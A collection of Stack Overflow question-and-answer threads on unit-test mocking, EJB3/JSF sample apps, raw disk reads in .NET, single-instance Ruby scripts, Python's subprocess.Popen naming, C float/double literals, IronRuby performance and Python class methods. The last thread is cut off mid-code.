For example, when you are trying to test some logic in your unit of code but you need to get something from another object and what is returned from this dependency might affect what you are trying to test - mock that object.
A great podcast on the topic can be found here
A: Mock objects are useful when you want to test interactions between a class under test and a particular interface.
For example, we want to test that method sendInvitations(MailServer mailServer) calls MailServer.createMessage() exactly once, and also calls MailServer.sendMessage(m) exactly once, and no other methods are called on the MailServer interface. This is when we can use mock objects.
With mock objects, instead of passing a real MailServerImpl, or a test TestMailServer, we can pass a mock implementation of the MailServer interface. Before we pass a mock MailServer, we "train" it, so that it knows what method calls to expect and what return values to return. At the end, the mock object asserts, that all expected methods were called as expected.
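To make that concrete, here is roughly what such a test could look like with a mocking framework such as Mockito (static imports from org.mockito.Mockito omitted; the MailServer and Message types come from the example above, while invitationSender is a hypothetical object under test):
@Test
public void sendInvitationsUsesMailServerExactlyOnce() {
    MailServer mailServer = mock(MailServer.class);
    Message message = mock(Message.class);
    when(mailServer.createMessage()).thenReturn(message);
    // exercise the code under test with the mock collaborator
    invitationSender.sendInvitations(mailServer);
    // verify the expected interactions happened, and nothing else
    verify(mailServer, times(1)).createMessage();
    verify(mailServer, times(1)).sendMessage(message);
    verifyNoMoreInteractions(mailServer);
}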
This sounds good in theory, but there are also some downsides.
Mock shortcomings
If you have a mock framework in place, you are tempted to use a mock object every time you need to pass an interface to the class under test. This way you end up testing interactions even when it is not necessary. Unfortunately, unwanted (accidental) testing of interactions is bad, because then you're testing that a particular requirement is implemented in a particular way, instead of testing that the implementation produced the required result.
Here's an example in pseudocode. Let's suppose we've created a MySorter class and we want to test it:
// the correct way of testing
testSort() {
testList = [1, 7, 3, 8, 2]
MySorter.sort(testList)
assert testList equals [1, 2, 3, 7, 8]
}
// incorrect, testing implementation
testSort() {
testList = [1, 7, 3, 8, 2]
MySorter.sort(testList)
assert that compare(1, 2) was called once
assert that compare(1, 3) was not called
assert that compare(2, 3) was called once
....
}
(In this example we assume that it's not a particular sorting algorithm, such as quick sort, that we want to test; in that case, the latter test would actually be valid.)
In such an extreme example it's obvious why the latter example is wrong. When we change the implementation of MySorter, the first test does a great job of making sure we still sort correctly, which is the whole point of tests - they allow us to change the code safely. On the other hand, the latter test always breaks and it is actively harmful; it hinders refactoring.
Mocks as stubs
Mock frameworks often allow also less strict usage, where we don't have to specify exactly how many times methods should be called and what parameters are expected; they allow creating mock objects that are used as stubs.
Let's suppose we have a method sendInvitations(PdfFormatter pdfFormatter, MailServer mailServer) that we want to test. The PdfFormatter object can be used to create the invitation. Here's the test:
testInvitations() {
// train as stub
pdfFormatter = create mock of PdfFormatter
let pdfFormatter.getCanvasWidth() returns 100
let pdfFormatter.getCanvasHeight() returns 300
let pdfFormatter.addText(x, y, text) returns true
let pdfFormatter.drawLine(line) does nothing
// train as mock
mailServer = create mock of MailServer
expect mailServer.sendMail() called exactly once
// do the test
sendInvitations(pdfFormatter, mailServer)
assert that all pdfFormatter expectations are met
assert that all mailServer expectations are met
}
In this example, we don't really care about the PdfFormatter object so we just train it to quietly accept any call and return some sensible canned return values for all methods that sendInvitation() happens to call at this point. How did we come up with exactly this list of methods to train? We simply ran the test and kept adding the methods until the test passed. Notice, that we trained the stub to respond to a method without having a clue why it needs to call it, we simply added everything that the test complained about. We are happy, the test passes.
But what happens later, when we change sendInvitations(), or some other class that sendInvitations() uses, to create more fancy pdfs? Our test suddenly fails because now more methods of PdfFormatter are called and we didn't train our stub to expect them. And usually it's not only one test that fails in situations like this, it's any test that happens to use, directly or indirectly, the sendInvitations() method. We have to fix all those tests by adding more trainings. Also notice, that we can't remove methods no longer needed, because we don't know which of them are not needed. Again, it hinders refactoring.
Also, the readability of the test suffers terribly; there's lots of code there that we didn't write because we wanted to, but because we had to; it's not us who want that code there. Tests that use mock objects look very complex and are often difficult to read. The tests should help the reader understand how the class under the test should be used, thus they should be simple and straightforward. If they are not readable, nobody is going to maintain them; in fact, it's easier to delete them than to maintain them.
How to fix that? Easily:
*
*Try using real classes instead of mocks whenever possible. Use the real PdfFormatterImpl. If it's not possible, change the real classes to make it possible. Not being able to use a class in tests usually points to some problems with the class. Fixing the problems is a win-win situation - you fixed the class and you have a simpler test. On the other hand, not fixing it and using mocks is a no-win situation - you didn't fix the real class and you have more complex, less readable tests that hinder further refactorings.
*Try creating a simple test implementation of the interface instead of mocking it in each test, and use this test class in all your tests. Create TestPdfFormatter that does nothing. That way you can change it once for all tests and your tests are not cluttered with lengthy setups where you train your stubs.
All in all, mock objects have their use, but when not used carefully, they often encourage bad practices, testing implementation details, hinder refactoring and produce difficult to read and difficult to maintain tests.
For some more details on shortcomings of mocks see also Mock Objects: Shortcomings and Use Cases.
A: A unit test should test a single codepath through a single method. When the execution of a method passes outside of that method, into another object, and back again, you have a dependency.
When you test that code path with the actual dependency, you are not unit testing; you are integration testing. While that's good and necessary, it isn't unit testing.
If your dependency is buggy, your test may be affected in such a way to return a false positive. For instance, you may pass the dependency an unexpected null, and the dependency may not throw on null as it is documented to do. Your test does not encounter a null argument exception as it should have, and the test passes.
Also, you may find it's hard, if not impossible, to reliably get the dependent object to return exactly what you want during a test. That also includes throwing expected exceptions within tests.
A mock replaces that dependency. You set expectations on calls to the dependent object, set the exact return values it should give you to perform the test you want, and/or what exceptions to throw so that you can test your exception handling code. In this way you can test the unit in question easily.
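For example, forcing a dependency to fail so the error-handling path can be exercised deterministically might look like this (Mockito-style sketch; the Repository, Service and ServiceException types are hypothetical):
// Stub the dependency to throw, then assert the unit translates the failure
// instead of letting it escape unhandled.
Repository repository = mock(Repository.class);
when(repository.findById(42L)).thenThrow(new RuntimeException("connection lost"));
Service service = new Service(repository);
assertThrows(ServiceException.class, () -> service.loadAndFormat(42L));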
TL;DR: Mock every dependency your unit test touches.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38181",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "179"
} |
Q: Any data-driven open source JEE5 EJB3+JSF Sample Project out there? I am looking for an open source project that uses EJB3 as backend and JSF as frontend. It should not be a tutorial but a real application that real people are using.
The application should be data-driven, i.e. the following aspects are fundamental and make up 80% or more of the application.
*
*form-based (many input forms)
*table views, master/detail, etc.
*CRUD (create/read/update/delete)-Operations have been implemented
*support for relations: 1:1, 1:n
*JPA Entity Beans + EJB 3 Stateless Session Beans for Facade
*no JBoss Seam
Typical applications are CRM / ERP projects where people work a lot with lists, tables, and forms. But any other "administrative" application should be OK, too.
I know petstore, but that application isn't form-based. petstore is an end-user application. I am looking for backend-user applications.
Something like Microsofts AdventureWorks series, but with EJB3+JSF...
Something like SugarCRM, but with EJB3+JSF...
I've googled a lot... with no results :-(
*
*@Matthew: the samples provided with NetBeans are too simple.
*@JB: It should be a real application. Not a "how to do EJB+JSF" application.
*@50-50: voted down because of seam
*@Kariem: I can't use seam, AppFuse hasn't EJB Session Beans
A: Seam examples are quite good. They are stand-alone projects, that you may deploy out of the box.
A: I feel your pain, this is not an answer, as much as an observation that the Java World in general suffers from the lack of good applications that go beyond the tutorial. Some of the sample .NET applications are very good and show interesting techniques, while solving small enough problems that the novice can wrap their heads around the entire application and see "real code" doing "real things".
I have not looked at the Seam examples, so they may well be an exception, but having sample applications, particularly the CRUD, Query, Report style back office applications you're talking about, is a great help to folks and I wish there were more in the Java community.
A: You might poke around at these real world JSF apps and see if any of them have their source available: RealWorldJsfLinks
A: I am not sure is it 100% what your looking for, but check out the built in example that comes packaged with NetBeans 6.1. It uses JSF/EJB3/ApacheDerby. I played around with it for like 20 minutes and thought it was pretty cool as a simple/starter JavaEE application to learn from.
A: I have to second jb's comment: The seam examples are great and can be put to use. The Seam Homepage uses the Seam Wiki from the examples (that application alone fulfills all the outlined criteria). Other examples in the distribution: Hotel Booking, DVD Store, and a Blog. The documentation contains quite some information on the special parts of the examples.
The "problem" might be that Seam covers a lot of the details you'd usually have to do in a traditional EJB3/JSF application. You might want to have a look at AppFuse or AppFuse Light. They have one application with examples using different technologies, including EJB3 (JPA only) and JSF. The examples are not as sophisticated (don't really fulfill your criteria), but contain a lot of useful stuff.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38183",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "5"
} |
Q: How do I read a disk directly with .NET? Is it possible to read a disk directly with .NET? By directly, I mean via the device bypassing the file system. I think I would go about this by opening the device some way "\Device\Ide\IdeDeviceP2T0L0-1" for example.
If I can't open the device with a .NET API, knowing which Win32 API to use would be helpful.
A: CreateFile has support for direct disk access. Read the notes under "Physical Disks and Volumes". You should be able to P/Invoke the call.
Note that Vista and Server 2008 have severely restricted this.
A: Cool, thank you Mark, I had forgotten that CreateFile opens things too. I was looking at the volume management API and not seeing how to open things.
Here is a little class that wraps things up. It might also be possible/correct to just pass the SafeFileHandle into a FileStream.
using System;
using System.Runtime.InteropServices;
using System.IO;
using Microsoft.Win32.SafeHandles;
namespace ReadFromDevice
{
public class DeviceStream : Stream, IDisposable
{
public const short FILE_ATTRIBUTE_NORMAL = 0x80;
public const short INVALID_HANDLE_VALUE = -1;
public const uint GENERIC_READ = 0x80000000;
public const uint GENERIC_WRITE = 0x40000000;
public const uint CREATE_NEW = 1;
public const uint CREATE_ALWAYS = 2;
public const uint OPEN_EXISTING = 3;
// Use interop to call the CreateFile function.
// For more information about CreateFile,
// see the unmanaged MSDN reference library.
[DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
private static extern IntPtr CreateFile(string lpFileName, uint dwDesiredAccess,
uint dwShareMode, IntPtr lpSecurityAttributes, uint dwCreationDisposition,
uint dwFlagsAndAttributes, IntPtr hTemplateFile);
[DllImport("kernel32.dll", SetLastError = true)]
private static extern bool ReadFile(
IntPtr hFile, // handle to file
byte[] lpBuffer, // data buffer
int nNumberOfBytesToRead, // number of bytes to read
ref int lpNumberOfBytesRead, // number of bytes read
IntPtr lpOverlapped
//
// ref OVERLAPPED lpOverlapped // overlapped buffer
);
private SafeFileHandle handleValue = null;
private FileStream _fs = null;
public DeviceStream(string device)
{
Load(device);
}
private void Load(string Path)
{
if (string.IsNullOrEmpty(Path))
{
throw new ArgumentNullException("Path");
}
// Try to open the file.
IntPtr ptr = CreateFile(Path, GENERIC_READ, 0, IntPtr.Zero, OPEN_EXISTING, 0, IntPtr.Zero);
handleValue = new SafeFileHandle(ptr, true);
_fs = new FileStream(handleValue, FileAccess.Read);
// If the handle is invalid,
// get the last Win32 error
// and throw a Win32Exception.
if (handleValue.IsInvalid)
{
Marshal.ThrowExceptionForHR(Marshal.GetHRForLastWin32Error());
}
}
public override bool CanRead
{
get { return true; }
}
public override bool CanSeek
{
get { return false; }
}
public override bool CanWrite
{
get { return false; }
}
public override void Flush()
{
return;
}
public override long Length
{
get { return -1; }
}
public override long Position
{
get
{
throw new NotImplementedException();
}
set
{
throw new NotImplementedException();
}
}
/// <summary>
/// </summary>
/// <param name="buffer">An array of bytes. When this method returns, the buffer contains the specified byte array with the values between offset and
/// (offset + count - 1) replaced by the bytes read from the current source. </param>
/// <param name="offset">The zero-based byte offset in buffer at which to begin storing the data read from the current stream. </param>
/// <param name="count">The maximum number of bytes to be read from the current stream.</param>
/// <returns></returns>
public override int Read(byte[] buffer, int offset, int count)
{
int BytesRead =0;
var BufBytes = new byte[count];
if (!ReadFile(handleValue.DangerousGetHandle(), BufBytes, count, ref BytesRead, IntPtr.Zero))
{
Marshal.ThrowExceptionForHR(Marshal.GetHRForLastWin32Error());
}
for (int i = 0; i < BytesRead; i++)
{
buffer[offset + i] = BufBytes[i];
}
return BytesRead;
}
public override int ReadByte()
{
int BytesRead = 0;
var lpBuffer = new byte[1];
if (!ReadFile(
handleValue.DangerousGetHandle(), // handle to file
lpBuffer, // data buffer
1, // number of bytes to read
ref BytesRead, // number of bytes read
IntPtr.Zero
))
{ Marshal.ThrowExceptionForHR(Marshal.GetHRForLastWin32Error()); ;}
return lpBuffer[0];
}
public override long Seek(long offset, SeekOrigin origin)
{
throw new NotImplementedException();
}
public override void SetLength(long value)
{
throw new NotImplementedException();
}
public override void Write(byte[] buffer, int offset, int count)
{
throw new NotImplementedException();
}
public override void Close()
{
handleValue.Close();
handleValue.Dispose();
handleValue = null;
base.Close();
}
private bool disposed = false;
new void Dispose()
{
Dispose(true);
base.Dispose();
GC.SuppressFinalize(this);
}
private new void Dispose(bool disposing)
{
// Check to see if Dispose has already been called.
if (!this.disposed)
{
if (disposing)
{
if (handleValue != null)
{
_fs.Dispose();
handleValue.Close();
handleValue.Dispose();
handleValue = null;
}
}
// Note disposing has been done.
disposed = true;
}
}
}
}
And an example of using the class
static void Main(string[] args)
{
var reader = new BinaryReader(new DeviceStream(@"\\.\PhysicalDrive3"));
var writer = new BinaryWriter(new FileStream(@"g:\test.dat", FileMode.Create));
var buffer = new byte[MB];
int count;
int loopcount=0;
try{
while((count=reader.Read(buffer,0,MB))>0)
{
writer.Write(buffer,0,count);
System.Console.Write('.');
if(loopcount%100==0)
{
System.Console.WriteLine();
System.Console.WriteLine("100MB written");
writer.Flush();
}
loopcount++;
}
}
catch(Exception e)
{
Console.WriteLine(e.Message);
}
reader.Close();
writer.Flush();
writer.Close();
}
Standard disclaimers apply, this code may be hazardous to your health.
A: Agree with Mark's answer. Note that if User Account Control is enabled (which is the default on Windows Vista and higher), your program must be running elevated (with Administrative privileges). If your program is used by only a few users, you can request the user to right-click the executable files and choose "Run as Administrator". Otherwise, you can compile a manifest file into the program, and in the manifest, specify that the program needs to be run elevated (search for "requestedExecutionLevel requireAdministrator" to get more information).
A: In .NET 5, you can use the FileStream method to read a file on the disk.
new FileStream(@"\\.\PhysicalDrive1", FileMode.Open, FileAccess.Read, FileShare.ReadWrite)
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38190",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "14"
} |
Q: Determine if a ruby script is already running Is there an easy way to tell if a ruby script is already running and then handle it appropriately? For example: I have a script called really_long_script.rb. I have it cronned to run every 5 minutes. When it runs, I want to see if the previous run is still running and then stop the execution of the second script. Any ideas?
A: Using ps is a really poor way of doing that, and it is probably open to race conditions.
The traditional Unix/Linux way would be to write the PID to a file (typically in /var/run) and check to see if that file exists on startup.
e.g. with the pidfile located at /var/run/myscript.pid, you'd check to see if that file exists before running the program. There are a few tricks to avoid race conditions, involving using O_EXCL (exclusive locking) to open the file, and symbolic links.
However unlikely a race may be, you should try to avoid race conditions by using atomic operations on the filesystem.
To save re-inventing the wheel, you might want to look at http://rubyforge.org/projects/pidify/
A: Highlander
Description
A gem that ensures only one instance of your main script is running.
In short, there can be only one.
Installation
gem install highlander
Synopsis
require 'highlander' # This should be the -first- thing in your code.
# Your code here
Meanwhile, back on the command line...
# First attempt, works. Assume it's running in the background.
ruby your_script.rb
# Second attempt while the first instance is still running, fails.
ruby your_script.rb # => RuntimeError
Notes
Simply requiring the highlander gem ensures that only one instance
of the script can be running; a second instance cannot be started. If you try to start it again
it will raise a RuntimeError.
A: You should probably also check that the process is actually running, so that if your script dies without cleaning itself up, it will run the next time rather than simply checking that
/var/run/foo.pid exists and exiting.
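The question asks about Ruby, but the pidfile-plus-liveness-check idea described in the two answers above is language-agnostic. Here is a rough sketch of it in Python, purely for illustration: the pidfile path and overall structure are assumptions, and a fully race-free version would create the pidfile with O_EXCL as mentioned earlier.
import os, sys

PIDFILE = "/var/run/really_long_script.pid"  # assumed location, adjust as needed

def already_running():
    try:
        with open(PIDFILE) as f:
            pid = int(f.read().strip())
    except (OSError, ValueError):
        return False          # no pidfile (or garbage in it): not running
    try:
        os.kill(pid, 0)       # signal 0 only checks that the process exists
        return True
    except OSError:
        return False          # stale pidfile left over from a crashed run

if already_running():
    sys.exit("previous run still in progress")
with open(PIDFILE, "w") as f:
    f.write(str(os.getpid()))
try:
    pass  # ... the long-running work goes here ...
finally:
    os.remove(PIDFILE)
The Ruby version follows the same shape; only the file and process-signalling calls change.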
A: In bash:
if ps aux | grep really_long_script.rb | grep -vq grep
then
echo Script already running
else
ruby really_long_script.rb
fi
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38193",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "6"
} |
Q: Why is the subprocess.Popen class not named Subprocess? The primary class in the subprocess module is named Popen, and represents a subprocess. Popen sounds like someone was trying to force the name to follow some function naming format, rather than choosing a name that actually represents what the object is. Does anyone know why it was chosen over something simple like, say, Subprocess?
A: Now, I'm not saying that this is the greatest name in the world, but here was the idea as I understand it.
Originally, the popen family was in the os module and was an implementation of the venerable POSIX popen. The move to the subprocess module would have been an opportune time to rename them, but I guess that keeping Popen makes it easier to find in the docs for those who have a long history with Python, or even with the venerable POSIX functions.
From its earliest posix incarnation, Popen has always been meant to open a Process and allow you to read and write from its stdio like a file. Thus the mnemonic for Popen is that it is short for ProcessOpen in an attempt to kind of, sorta, look like open.
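A minimal illustration of that mnemonic (modern Python 3 syntax; running the interpreter itself as the child is just a portable stand-in for any command): the object Popen returns exposes the child's stdio as file-like handles, so you read it much like the result of open().
import subprocess, sys

# "Process open": start a child process and treat its stdout like a file.
proc = subprocess.Popen([sys.executable, "-c", "print('hello')"],
                        stdout=subprocess.PIPE, text=True)
line = proc.stdout.readline()   # read from the pipe as if it were a file object
proc.wait()                     # reap the child
print(line.strip())             # -> hello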
A: subprocess.Popen replaces the group of os.popenX POSIX functions (which have a long history). I suppose that the name Popen makes it more likely for people used to the old functions to find and use the new ones.
The PEP for subprocess (PEP 324) has a little bit of discussion on the name of the module but not of class Popen. The list of PEPs (Python enhancement proposals) is in general an excellent place to start if you're looking for the rationale for features of Python.
A: I suppose the name was chosen because the functionality subprocess is replacing was formerly in the os module as the os.popen function. There could be even ways to automate migration between the two.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38197",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "4"
} |
Q: Why does this C code produce a double instead of a float? celsius = (5.0/9.0) * (fahr-32.0);
Is it just a development choice that the C developers decided upon or is there a reason to this? I believe a float is smaller than a double, so it might be to prevent overflows caused by not knowing what decimal format to use. Is that the reason, or am I overlooking something?
A: I think the reason is to ensure that any result can be represented, so the natural choice is double, as it is the larger of the two floating-point types.
A: The reason the expression is evaluated in double precision is that the literals specified are double-precision values by default. If you specify the literals used in the equation as floats, the expression will return a float. Consider the following code (Mac OS X using gcc 4.01).
#include <stdio.h>
int main() {
float celsius;
float fahr = 212;
printf("sizeof(celsius) ---------------------> %d\n", sizeof(celsius));
printf("sizeof(fahr) ------------------------> %d\n", sizeof(fahr));
printf("sizeof(double) ----------------------> %d\n", sizeof(double));
celsius = (5.0f/9.0f) * (fahr-32.0f);
printf("sizeof((5.0f/9.0f) * (fahr-32.0f)) --> %d\n", sizeof((5.0f/9.0f) * (fahr-32.0f)));
printf("sizeof((5.0/9.0) * (fahr-32.0)) -----> %d\n", sizeof((5.0/9.0) * (fahr-32.0)));
printf("celsius -----------------------------> %f\n", celsius);
}
Output is:
sizeof(celsius) ---------------------> 4
sizeof(fahr) ------------------------> 4
sizeof(double) ----------------------> 8
sizeof((5.0f/9.0f) * (fahr-32.0f)) --> 4
sizeof((5.0/9.0) * (fahr-32.0)) -----> 8
celsius -----------------------------> 100.000008
A: celsius = (5.0/9.0) * (fahr-32.0);
In this expression, 5.0, 9.0, and 32.0 are doubles. That's the default type for a floating-point constant - if you wanted them to be floats, then you would use the F suffix:
celsius = (5.0F/9.0F) * (fahr-32.0F);
Note that if fahr was a double, then the result of this last expression would still be a double: as Vaibhav noted, types are promoted in such a way as to avoid potentially losing precision.
A: Floating-point constants should carry the highest precision available. The result can be assigned to a float without undue trouble.
A: Back in the days of K&R v1, using float and double interchangeably was encouraged, since all expressions with floating-point types were always evaluated using the `double' representation; this is a problem in cases where efficiency is paramount. A floating-point constant without an f, F, l, or L suffix is of type double. If the letter f or F is the suffix, the constant is of type float, and if suffixed by the letter l or L, it is of type long double.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38198",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "5"
} |
Q: IronRuby performance? While I know IronRuby isn't quite ready for the world to use it, I was wondering if anyone here tried it and tested how well it faired against the other Rubies out there in terms of raw performance?
If so, what are the results, and how did you go about measuring the performance (which benchmarks etc)?
Edit: The IronRuby team maintains a site on how they compare to Ruby MRI 1.8 at http://ironruby.info/. Below the spec pass rate table, they also have some information on how IronRuby performs on these specs. This table is not continuously updated, but I assume they update it often enough (you can see the last update at the top of the page).
A: Antonio Cangiano just published some new benchmarks (August 09), IronRuby seems to be faster across that board than MRI under Windows. John Lam and co have done a fantastic job and are not done optimising.
A: According to this article http://www.iunknown.com/2008/05/ironruby-and-rails.html, in May performance was nowhere near where they expected it to be. I heard in http://altnetpodcast.com/episodes/9-state-of-ironruby (3 days ago) that they're still working on performance. I guess they put compatibility first and are now trying to get the performance up to par with the other Ruby implementations out there.
As far as I understand, it's not nearly as performant as IronPython, which is developed by the same team. I don't know whether this is because IronRuby uses the DLR a lot more and the DLR still needs to be optimized, or whether the IronRuby implementation itself needs more optimization. But I guess it is good news either way, because it means they can make it a lot faster. So if you're already happy with the performance, you'll get a lot happier.
A: The load time and the memory utilization are still the two weakest points in IronRuby. Once a particular piece of code has been loaded and is running in a sort of steady-state mode -- that is, little to no new source is being evaluated -- then the performance should be quite good.
To answer your specific question, consider this data.
A: I have used it and it has worked great for what I have done. However, my measuring of performance isn't really scientific, because it was all visual. I did notice that IronRuby seemed a little snappier when I compared the two programs on equal tasks. I really think this had more to do with .NET's strong, tight binding to IIS than with the raw speed of the framework.
But I could be totally wrong, because I didn't stress my applications to the levels that Twitter might see. From my .NET experience, though, I expect it would hold up just as well as, if not better than, current production Ruby applications.
By the way, I tested Ruby using FastCGI under IIS.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38235",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "3"
} |
Q: What is the purpose of class methods? I'm teaching myself Python and my most recent lesson was that Python is not Java, and so I've just spent a while turning all my Class methods into functions.
I now realise that I don't need to use class methods for what I would have done with static methods in Java, but now I'm not sure when I would use them. All the advice I can find about Python class methods is along the lines that newbies like me should steer clear of them, and the standard documentation is at its most opaque when discussing them.
Does anyone have a good example of using a Class method in Python or at least can someone tell me when Class methods can be sensibly used?
A: Factory methods (alternative constructors) are indeed a classic example of class methods.
Basically, class methods are suitable anytime you would like to have a method which naturally fits into the namespace of the class, but is not associated with a particular instance of the class.
As an example, in the excellent unipath module:
Current directory
*
*Path.cwd() -- return the actual current directory; e.g., Path("/tmp/my_temp_dir"). This is a class method.
*
*.chdir() -- make self the current directory.
As the current directory is process wide, the cwd method has no particular instance with which it should be associated. However, changing the cwd to the directory of a given Path instance should indeed be an instance method.
Hmmm... as Path.cwd() does indeed return a Path instance, I guess it could be considered to be a factory method...
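To make the factory/alternative-constructor idea concrete, here is a minimal sketch; the Point class and the from_tuple name are made up for illustration, not taken from any particular library.
class Point:
    def __init__(self, x, y):
        self.x, self.y = x, y

    @classmethod
    def from_tuple(cls, pair):
        # Alternative constructor: lives in the class's namespace but is not
        # tied to any particular instance.
        return cls(pair[0], pair[1])

p = Point.from_tuple((3, 4))
print(p.x, p.y)   # -> 3 4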
A: Honestly? I've never found a use for staticmethod or classmethod. I've yet to see an operation that can't be done using a global function or an instance method.
It would be different if python used private and protected members more like Java does. In Java, I need a static method to be able to access an instance's private members to do stuff. In Python, that's rarely necessary.
Usually, I see people using staticmethods and classmethods when all they really need to do is use python's module-level namespaces better.
A: Think about it this way: normal methods are useful to hide the details of dispatch: you can type myobj.foo() without worrying about whether the foo() method is implemented by the myobj object's class or one of its parent classes. Class methods are exactly analogous to this, but with the class object instead: they let you call MyClass.foo() without having to worry about whether foo() is implemented specially by MyClass because it needed its own specialized version, or whether it is letting its parent class handle the call.
Class methods are essential when you are doing set-up or computation that precedes the creation of an actual instance, because until the instance exists you obviously cannot use the instance as the dispatch point for your method calls. A good example can be viewed in the SQLAlchemy source code; take a look at the dbapi() class method at the following link:
https://github.com/zzzeek/sqlalchemy/blob/ab6946769742602e40fb9ed9dde5f642885d1906/lib/sqlalchemy/dialects/mssql/pymssql.py#L47
You can see that the dbapi() method, which a database backend uses to import the vendor-specific database library it needs on demand, is a class method because it needs to run before instances of a particular database connection start getting created, but it cannot be a simple function or static method, because they want it to be able to call other supporting methods that might similarly need to be written more specifically in subclasses than in their parent class. And if you dispatch to a plain function or static method, then you "forget" and lose the knowledge of which class is doing the initializing.
A: I used to work with PHP, and recently I was asking myself: what's going on with this classmethod? The Python manual is very technical and very terse, so it doesn't help with understanding the feature. After a lot of googling I found an answer -> http://code.anjanesh.net/2007/12/python-classmethods.html.
If you're too lazy to click it, my shorter explanation is below. :)
In PHP (maybe not all of you know PHP, but the language is so straightforward that everybody should understand what I'm talking about) we have static variables like this:
class A
{
static protected $inner_var = null;
static public function echoInnerVar()
{
echo self::$inner_var."\n";
}
static public function setInnerVar($v)
{
self::$inner_var = $v;
}
}
class B extends A
{
}
A::setInnerVar(10);
B::setInnerVar(20);
A::echoInnerVar();
B::echoInnerVar();
The output will be 20 in both cases.
However, in Python we can add the @classmethod decorator, and then the outputs are 10 and 20 respectively. Example:
class A(object):
inner_var = 0
@classmethod
def setInnerVar(cls, value):
cls.inner_var = value
@classmethod
def echoInnerVar(cls):
print cls.inner_var
class B(A):
pass
A.setInnerVar(10)
B.setInnerVar(20)
A.echoInnerVar()
B.echoInnerVar()
Smart, ain't it?
A: Class methods provide a "semantic sugar" (don't know if this term is widely used) - or "semantic convenience".
Example: you got a set of classes representing objects. You might want to have the class method all() or find() to write User.all() or User.find(firstname='Guido'). That could be done using module level functions of course...
A: If you are not a "programmer by training", this should help:
I think I understood the technical explanations above and elsewhere on the net, but I was always left with the question "Nice, but why do I need it? What is a practical use case?". Now life gave me a good example that clarified everything:
I am using it to control a global shared variable that is shared among instances of a class instantiated by the multi-threading module. In plain language, I am running multiple agents that create examples for deep learning IN PARALLEL. (Imagine multiple players playing an ATARI game at the same time, each saving the results of their game to one common repository (the SHARED VARIABLE).)
I instantiate the players/agents with the following code (in Main/Execution Code):
a3c_workers = [A3C_Worker(self.master_model, self.optimizer, i, self.env_name, self.model_dir) for i in range(multiprocessing.cpu_count())]
*
*it creates as many players as there are processor cores on my computer
A3C_Worker is a class that defines the agent.
a3c_workers is a list of instances of that class (i.e. each instance is one player/agent).
Now I want to know how many games have been played across all players/agents, so within the A3C_Worker definition I define the variable to be shared across all instances:
class A3C_Worker(threading.Thread):
global_shared_total_episodes_across_all_workers = 0
Now, as the workers finish their games, they each increase that count by 1 for every game finished.
At the end of my example generation I was closing the instances, but the shared variable still held the total number of games played. So when I re-ran the program, my initial total number of episodes was the previous total, whereas I needed that count to start fresh for each run.
To fix that I specified:
class A3C_Worker(threading.Thread):
@classmethod
def reset(cls):
A3C_Worker.global_shared_total_episodes_across_all_workers = 0
Then in the execution code I just call:
A3C_Worker.reset()
Note that this is a call on the CLASS overall, not on any INSTANCE of it individually, so it sets my counter to 0 for every new agent I initiate from then on.
Using a usual instance-method definition (def reset(self):) would require us to reset that counter for each instance individually, which would be more computationally demanding and harder to track.
A: What just hit me, coming from Ruby, is that a so-called class method and a so-called instance method are each just a function with semantic meaning applied to its first parameter, which is silently passed when the function is called as a method of an object (i.e. obj.meth()).
Normally that object must be an instance but the @classmethod method decorator changes the rules to pass a class. You can call a class method on an instance (it's just a function) - the first argument will be its class.
Because it's just a function, it can only be declared once in any given scope (i.e. class definition). It follows therefore, as a surprise to a Rubyist, that you can't have a class method and an instance method with the same name.
Consider this:
class Foo():
def foo(x):
print(x)
You can call foo on an instance
Foo().foo()
<__main__.Foo instance at 0x7f4dd3e3bc20>
But not on a class:
Foo.foo()
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
TypeError: unbound method foo() must be called with Foo instance as first argument (got nothing instead)
Now add @classmethod:
class Foo():
@classmethod
def foo(x):
print(x)
Calling on an instance now passes its class:
Foo().foo()
__main__.Foo
as does calling on a class:
Foo.foo()
__main__.Foo
It's only convention that dictates that we use self for that first argument on an instance method and cls on a class method. I used neither here to illustrate that it's just an argument. In Ruby, self is a keyword.
Contrast with Ruby:
class Foo
def foo()
puts "instance method #{self}"
end
def self.foo()
puts "class method #{self}"
end
end
Foo.foo()
class method Foo
Foo.new.foo()
instance method #<Foo:0x000000020fe018>
The Python class method is just a decorated function and you can use the same techniques to create your own decorators. A decorated method wraps the real method (in the case of @classmethod it passes the additional class argument). The underlying method is still there, hidden but still accessible.
footnote: I wrote this after a name clash between a class and instance method piqued my curiosity. I am far from a Python expert and would like comments if any of this is wrong.
A: I recently wanted a very lightweight logging class that would produce varying amounts of output depending on a logging level that could be set programmatically. But I didn't want to instantiate the class every time I wanted to output a debugging message, error, or warning. I also wanted to encapsulate the functioning of this logging facility and make it reusable without declaring any globals.
So I used class variables and the @classmethod decorator to achieve this.
With my simple Logging class, I could do the following:
Logger._level = Logger.DEBUG
Then, in my code, if I wanted to spit out a bunch of debugging information, I simply had to code
Logger.debug( "this is some annoying message I only want to see while debugging" )
Errors could be output with
Logger.error( "Wow, something really awful happened." )
In the "production" environment, I can specify
Logger._level = Logger.ERROR
and now, only the error message will be output. The debug message will not be printed.
Here's my class:
class Logger :
''' Handles logging of debugging and error messages. '''
DEBUG = 5
INFO = 4
WARN = 3
ERROR = 2
FATAL = 1
_level = DEBUG
def __init__( self ) :
Logger._level = Logger.DEBUG
@classmethod
def isLevel( cls, level ) :
return cls._level >= level
@classmethod
def debug( cls, message ) :
if cls.isLevel( Logger.DEBUG ) :
print "DEBUG: " + message
@classmethod
def info( cls, message ) :
if cls.isLevel( Logger.INFO ) :
print "INFO : " + message
@classmethod
def warn( cls, message ) :
